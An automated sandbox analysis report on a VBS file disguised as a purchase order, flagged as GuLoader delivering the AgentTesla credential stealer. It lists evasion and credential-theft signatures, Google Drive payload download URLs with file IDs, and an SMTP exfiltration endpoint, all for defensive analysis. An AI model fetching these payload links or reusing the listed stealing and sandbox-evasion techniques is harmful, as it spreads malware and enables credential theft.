Windows Analysis Report
Purchase Order N#U00b0 20240702.vbs

Overview

General Information

Sample name: Purchase Order N#U00b0 20240702.vbs
renamed because original name is a hash value
Original sample name: Purchase Order N 20240702.vbs
Analysis ID: 1466648
MD5: 1edfdc3dd0ca6725099d231b692e17c9
SHA1: bdce678c7e0fd94fb71f88cb9c06e55693354943
SHA256: 2aff5a705b45d185d32d09a6af87fce06d9a0af2d0830aca0b13543c26f3c3b7
Tags: vbs
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection

barindex
Source: cmd.exe.7988.20.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "8?Q??d?:B.??@??L????k.?D???F\"", "Username": "?D?p?*??@?<???.??:?", "Password": "??x?U.?"}
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.7:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: Binary string: ore.pdb source: powershell.exe, 00000013.00000002.2384489438.0000000002B4D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdbGCTL source: ysaPFN.exe.21.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000013.00000002.2390567297.00000000070F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wab.pdb source: ysaPFN.exe.21.dr

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: global traffic TCP traffic: 192.168.2.7:49711 -> 107.181.234.46:587
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ip-api.com
Source: global traffic TCP traffic: 192.168.2.7:49711 -> 107.181.234.46:587
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-KlUQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1yzeORlWdWKE15en4v7t0ymp96mb-KlUQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_Z HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_Z&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-KlUQ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /download?id=1yzeORlWdWKE15en4v7t0ymp96mb-KlUQ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_Z HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /download?id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_Z&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: ysmglobalsourcing.com
Source: powershell.exe, 00000013.00000002.2390567297.00000000070F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1214778562.000001CB0660B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215082660.000001CB06632000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?08acc3b103974
Source: wscript.exe, 00000000.00000003.1214948169.000001CB083E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1215211128.000001CB08408000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?08acc3b103
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CDD58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.google.com
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CDD91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://drive.usercontent.google.com
Source: wab.exe, 00000015.00000002.2589661383.0000000022871000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com
Source: wab.exe, 00000015.00000002.2589661383.0000000022871000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 0000000F.00000002.2543561723.00000262DBFD9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2387916097.0000000005750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000013.00000002.2384989430.0000000004846000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wab.exe, 00000015.00000002.2589661383.00000000228D8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432412836.0000000024AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2577906258.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2590837200.0000000024A90000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432274209.0000000006F63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0
Source: wab.exe, 00000015.00000002.2589661383.00000000228D8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432412836.0000000024AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2577906258.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2590837200.0000000024A90000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432274209.0000000006F63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CBF71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2384989430.00000000046F1000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2589661383.0000000022871000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000013.00000002.2384989430.0000000004846000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, 00000015.00000002.2590837200.0000000024A90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr
Source: wab.exe, 00000015.00000002.2589661383.00000000228D8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2577906258.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2590837200.0000000024A90000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432274209.0000000006F63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: wab.exe, 00000015.00000002.2589661383.00000000228D8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2577906258.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2590837200.0000000024A90000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432274209.0000000006F63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: wab.exe, 00000015.00000002.2589661383.00000000228D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ysmglobalsourcing.com
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CBF71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000013.00000002.2384989430.00000000046F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CC434000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CDD7A000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364536741.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2364451227.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000013.00000002.2387916097.0000000005750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.2387916097.0000000005750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.2387916097.0000000005750000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.g
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.go
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.goo
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.goog
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CDD53000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googP
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.googl
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.c
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.co0
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CDCF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CC3DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2577739206.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/
Source: wab.exe, 00000015.00000002.2577739206.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/X
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/u
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?e
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?ex
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?exp
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?expo
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?expor
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=d
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=do
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=dow
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=down
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=downl
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=downlo
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=downloa
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&i
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1
Source: wab.exe, 00000015.00000002.2577906258.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432274209.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000002.2589008106.0000000021F90000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_Z
Source: wab.exe, 00000015.00000002.2577739206.0000000006F33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_ZJ
Source: wab.exe, 00000015.00000003.2383605144.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_ZT
Source: wab.exe, 00000015.00000002.2577739206.0000000006F33000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1NSWYwJ8clchRCA8qFPRUlk146KNVbj_Zh
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1y
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yz
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yze
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeO
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeOR
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORl
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlW
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWd
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdW
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWK
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE1
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15e
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0y
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ym
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp9
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96m
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-K
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-Kl
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-KlU
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CD2A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-KlUQ
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CC196000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-KlUQP
Source: powershell.exe, 00000013.00000002.2384989430.0000000004846000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1yzeORlWdWKE15en4v7t0ymp96mb-KlUQXR
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 0000000F.00000002.2464771594.00000262CDD7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2464771594.00000262CC438000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com
Source: wab.exe, 00000015.00000002.2577906258.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432274209.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2383605144.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/
Source: wab.exe, 00000015.00000002.2577906258.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2432274209.0000000006F63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000015.00000003.2383605144.0000000006F8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/3
